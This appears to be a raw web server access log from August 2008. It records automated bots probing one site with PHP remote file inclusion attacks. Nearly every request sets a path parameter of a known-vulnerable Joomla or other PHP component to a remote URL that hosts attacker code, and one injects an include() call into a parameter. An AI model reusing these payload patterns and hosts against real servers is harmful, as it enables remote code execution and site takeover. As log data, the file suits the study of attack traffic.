198.66.208.57 - - [31/Aug/2008:09:30:20 -0700] "GET //plugins/payment/secpay/lib/nusoap.php?config[root_dir]=http://coveringspr.com/components/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:30:21 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:30:45 -0700] "GET /logs/access_080111.log//modules/vwar/admin/admin.php?vwar_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:30:46 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:30:46 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:30:48 -0700] "GET /logs/access_080528.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:30:58 -0700] "GET /logs/access_080514.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:30:58 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:30:58 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:30:59 -0700] "GET /logs/access_080514.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:31:00 -0700] "GET /logs/access_080514.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:31:00 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:31:01 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:31:02 -0700] "GET /logs/access_080514.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:31:02 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:31:02 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.173.42 - - [31/Aug/2008:09:31:06 -0700] "GET /logs/access_080111.log//modules/vwar/admin/admin.php?vwar_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [31/Aug/2008:09:31:06 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [31/Aug/2008:09:31:06 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.198.73.151 - - [31/Aug/2008:09:31:10 -0700] "GET /logs/access_080529.log//application.php?base_path=http://www.parsnegar.ir/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:09:31:12 -0700] "GET /logs/access_080730.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:31:18 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:31:19 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:31:19 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:31:20 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:31:20 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:31:21 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:31:22 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.14.46.18 - - [31/Aug/2008:09:31:31 -0700] "GET /logs/access_080621.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [31/Aug/2008:09:31:37 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:31:39 -0700] "GET /logs/access_080528.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:09:31:51 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:09:31:51 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:09:31:52 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:09:31:52 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
131.175.88.84 - - [31/Aug/2008:09:32:00 -0700] "GET /logs/access_080610.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/ids.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
131.175.88.84 - - [31/Aug/2008:09:32:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/ids.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
131.175.88.84 - - [31/Aug/2008:09:32:00 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/ids.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:32:12 -0700] "GET /logs/access_080111.log//modules/vwar/admin/admin.php?vwar_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:32:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:32:13 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:32:17 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:32:18 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:32:22 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:09:32:23 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:09:32:25 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:32:34 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:32:35 -0700] "GET /?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 200 89511 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:32:39 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:32:45 -0700] "GET /logs/access_080412.log/?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:32:47 -0700] "GET /?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 200 89495 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:32:48 -0700] "GET /logs/?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 200 63000 "-" "libwww-perl/5.79" "www.dmulk.com"
208.106.1.198 - - [31/Aug/2008:09:32:55 -0700] "GET /logs/access_080401.log//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
208.106.1.198 - - [31/Aug/2008:09:32:58 -0700] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 200 89842 "-" "libwww-perl/5.800" "www.dmulk.com"
208.106.1.198 - - [31/Aug/2008:09:32:58 -0700] "GET /logs//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
131.175.88.84 - - [31/Aug/2008:09:32:59 -0700] "GET /logs/access_080626.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/ids.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:33:05 -0700] "GET /logs/access_080804.log/?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:33:19 -0700] "GET /logs/?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 200 63000 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:33:21 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:33:21 -0700] "GET /?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 200 89527 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:33:28 -0700] "GET /logs/access_080805.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.84.82.15 - - [31/Aug/2008:09:33:28 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.84.82.15 - - [31/Aug/2008:09:33:28 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.84.82.15 - - [31/Aug/2008:09:33:28 -0700] "GET /logs/access_080514.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:09:33:32 -0700] "GET /errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:09:33:32 -0700] "GET /logs/access_080810.log/errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:09:33:32 -0700] "GET /logs/errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:33:47 -0700] "GET /logs/access_080820.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:33:48 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89902 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:33:49 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:09:33:52 -0700] "GET /errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:09:33:52 -0700] "GET /logs/access_080810.log/errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:09:33:53 -0700] "GET /logs/errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:09:33:56 -0700] "GET /logs/access_080821.log/errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:33:58 -0700] "GET /logs/access_080528.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:34:00 -0700] "GET /logs/access_080711.log/errors.php?error=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:34:09 -0700] "GET /logs/access_080615.log/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:09:34:15 -0700] "GET /logs/access_080821.log/errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.232.77.38 - - [31/Aug/2008:09:34:21 -0700] "GET /logs//contenido.php?sec=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
24.232.77.38 - - [31/Aug/2008:09:34:21 -0700] "GET //contenido.php?sec=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:34:22 -0700] "GET /logs/access_080820.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:34:23 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89902 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:34:24 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:09:34:35 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:34:35 -0700] "GET /logs/access_080528.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:09:34:39 -0700] "GET /logs/access_080528.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:09:34:40 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:34:44 -0700] "GET /logs/access_080604.log/errors.php?error=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:35:00 -0700] "GET /logs/access_080528.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.84.82.15 - - [31/Aug/2008:09:35:06 -0700] "GET /logs/access_080519.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:09:35:16 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:09:35:16 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:09:35:16 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.19.103 - - [31/Aug/2008:09:35:19 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:35:39 -0700] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:35:39 -0700] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.67.19.103 - - [31/Aug/2008:09:35:45 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:35:45 -0700] "GET /logs/access_080615.log/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.19.103 - - [31/Aug/2008:09:35:50 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:09:35:56 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:09:35:56 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:00 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:00 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:00 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:00 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:00 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:01 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:01 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:01 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:09:36:01 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:01 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:03 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:03 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:03 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:04 -0700] "GET /logs/access_080718.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
